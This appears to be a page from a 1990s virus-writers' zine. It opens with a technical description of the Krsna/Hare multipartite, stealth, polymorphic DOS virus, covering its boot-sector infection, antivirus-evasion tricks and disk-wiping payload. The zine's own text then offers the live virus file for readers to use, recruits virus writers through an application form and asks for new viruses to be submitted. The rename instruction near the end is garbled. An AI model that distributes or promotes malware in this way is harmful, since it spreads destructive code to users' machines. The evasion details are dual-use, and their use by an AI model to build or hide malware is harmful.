- TYPE: Stealth OS Boot MBR Boot Resident COM/EXE -files
- ORIGIN: Slovenia
This is a resident stealth multipartite virus with antiheuristics and antiemulation tricks, encrypted with a slow polymorphic encryption layer.
Krsna infects COM and EXE files, MBRs of hard drives and floppy boot sectors. Infected files and boot sectors are encrypted with a slowly changing polymorphic encryption layer. Infected files are marked by setting the seconds field of the time stamp to 34. Krnsa will not infect files starting with 'TB' or 'F-'.
When an infected file is run, the virus first infects the MBR of the hard drive. When the machine is rebooted, the virus will install itself to memory from the MBR and it starts to infect also floppy boot sectors during floppy access as well as COM and EXE files.
When resident, the virus occupies over 9kB of memory. Infected files will grow around 7-8kB in size, depending on the polymorphic decryptor. The polymorphic decryptor contains several conditional and unconditional jumps and several calls to do-nothing interrupts to confuse heuristics and emulation. Polymorphic encryption changes slowly, trying to make it difficult to create a large sample set with variable decryptors.
Krsna will attempt to hide itself in files, but it will sometimes report the infected files to be little bigger or smaller than they originally were.
Krsna is Windows 95 -aware: it will delete the floppy disk driver file to make make itself capable of spreading to floppy disks used from Win95.
Krsna activates on the 22nd of August. At this time it displays this text:
"HDEuthanasia" by Demon Emperor: Hare Krsna, hare, hare...
After this the virus attempts to overwrite the hard drive and A: and B: drives. This produces a 'Non-system disk' error, but the virus stays resident after the destruction is done - so it can still replicate if a boot floppy is inserted to start up the machine.
Krsna was found in the wild in USA in May 1996 and it was apparently distributed over the internet, as infections were soon found from Canada, UK, Switzerland, Russia and The Netherlands.
Hare.7750
This is a newer variant which has some bugs corrected. The text message in the virus has been changed to:
"HDEuthanasia-v2" by Demon Emperor: Hare, Krsna, hare, hare...
Otherwise the virus is like the original variant.
Hare.7786
The text message in this variant has been changed to:
"HDEuthanasia-v3" by Demon Emperor: Hare, Krsna, hare, hare...
Krsna.7610
Krsna.7610 is a very dangerous memory resident multipartite stealth and polymorphic virus. It infects COM, EXE files as well as the MBR of the hard drive and boot sectors of the floppy disks. In files, the virus is encrypted three times. In infected sectors the virus is polymorphic as well as in the infected files.
Installing and Infecting
When an infected file is executed the virus decrypts itself, infects MBR of the hard drive, traces and hooks INT 21h, and returns to the host program. Then the virus writes itself to the end of COM and EXE files that are executed, closed or on DOS calls Terminate (AH=0,31h,4Ch). Under Win95 the virus also hooks INT 13h.
While opening an infected EXE file the virus disinfects it. When the virus infects a file, it checks the file name and does not infect the files:
- TB*.*
- F-*.*
- IV*.*
- CH*.*
- COMMAND*.*
The virus also does not infect the file if there is letter 'V' in its name.
While loading from infected boot sector of the floppy disk the virus just infects the MBR, returns the control to the host sector, and does not stay memory resident.
While infecting the hard drive the virus traces INT 13h or uses direct calls to the HD ports, then it writes itself to the MBR sector, and the rest of code writes to the last available track in the hard drive (the track that is out of declared tracks - LandZone?).
When the virus stores and overwrites the original Disk Partition Table, as a result the FDISK/MBR command may crash the hard drive. While loading from infected MBR the virus restores Disk Partition Table to let DOS load the active boot sector and calculate the disk information (at this moment the virus' INT 13h stealth routine is not active), then it decreases the size of the system memory for its TSR copy (the word at the address 0000:0413), hooks INT 1Ch and returns the control to original MBR.
By hooking INT 1Ch the virus waits for the DOS loading procedure, then restores the size of the system memory, hooks INT 13h, 21h, 28h. On first INT 28h call the virus again corrupts the Disk Partition Table. I see no reason for such complex procedure of installation into the system, but only to fool the anti-virus hardware and software, if it is installed.
By hooking INT 13h the virus intercepts access to floppy disks, and infects them. While infecting the virus formats extra track on the disk, and writes its code to there. It also calls a stealth routine while accessing to infected disks.
Features
While executing a infected files the virus also searches for "WIN=" string in environment area, and deletes the \SYSTEM\IOSUBSYS\HSFLOP.PDR file in the Windows directory.
While installing memory resident the virus checks the system date and on the 22nd of August and September it erases the hard drive sectors and displays the message:
"HDEuthanasia" by Demon Emperor: Hare Krsna, hare, hare...
While infecting the MBR the virus performs some strange manipulation with keyboard: it hooks INT 16h, checks the keys that are entered, and sometimes substitutes them with 'Y" or 'N' keys. It looks as the virus tries to fool BIOS anti-virus features, and answer "Yes, Infect it!" on the standard request while writing to the MBR of the hard drive.
The virus uses quite a strange way to run its polymorphic routines. While infecting a computer the virus generates a block of random data and saves it to the last sectors of the hard drive. Then the virus does not correct these random data in any way. It restores that data (reads from the sector) while loading from infected MBR or while executing a infected file. While re-infecting the disk (if it has been disinfected) the virus detects these data in the last sector and does not renew them.
While infecting a file or a sector, the virus uses that data as a random generator to select the opcodes and keys for its polymorphic routines - in all cases the polymorphic routine gets the same data, and produces the same code when the virus infects any object.
As a result all polymorphic decryption loops contain the same code in all infected files that were infected on the same computer. All such files are encrypted by the same code and with the same keys. The length of the files grows on random value while infecting (VirusLength plus the length of polymorphic decryption loop), but that value is constant for all files on the same computer. And the same for infected floppy disks - all they contain the same polymorphic code in their boot sectors.
As a result all files and sectors that were infected on the computer have the constant mask to detect them with anti-virus utilities. Is it directed against anti-virus researchers, or just to fool users and hide the infected file/floppy-guest that caused infection?
I have put the virus into the file Hdeuthan.exv. As usual rename it to Hdeuthan.exv to use it!!
Virus Writers VBB Aplication Form
Please send this application to Dark_Night@ilf.net!!
--------------------------------------------------------------------------
* denotes optional entry
Real Name (*) [______________________]
Callsign [______________________]
How would you rate your assembly knowledge?
[_____________________________________________________________________]
How many virii have you programmed and what are their names?
Number:[____]
Names: [_____________________________________________________________]
Have you ever been member of any other VX or AV group? Are you still a
member?
[_________________________________________________________________________
_________________________________________________________________________]
Why would you like to be a member of VBB?
[__________________________________________________________________________
__________________________________________________________________________]
-----------------------------------------------------------------------------
Thanks for completing the VBB virus writers application. Please mail it to the E-Mail address listed on the top of the page.
Dark Night
WHERE TO ?
There are going to be a lot of changes everywhere, but we're going to stay as ever and bring you new virii and related material. But not only our whole group can do the work needed. We usually need some external help. That's why I would really appreciate it if you would submit new virii or any interesting articles to us.
Thanks!
Dark Night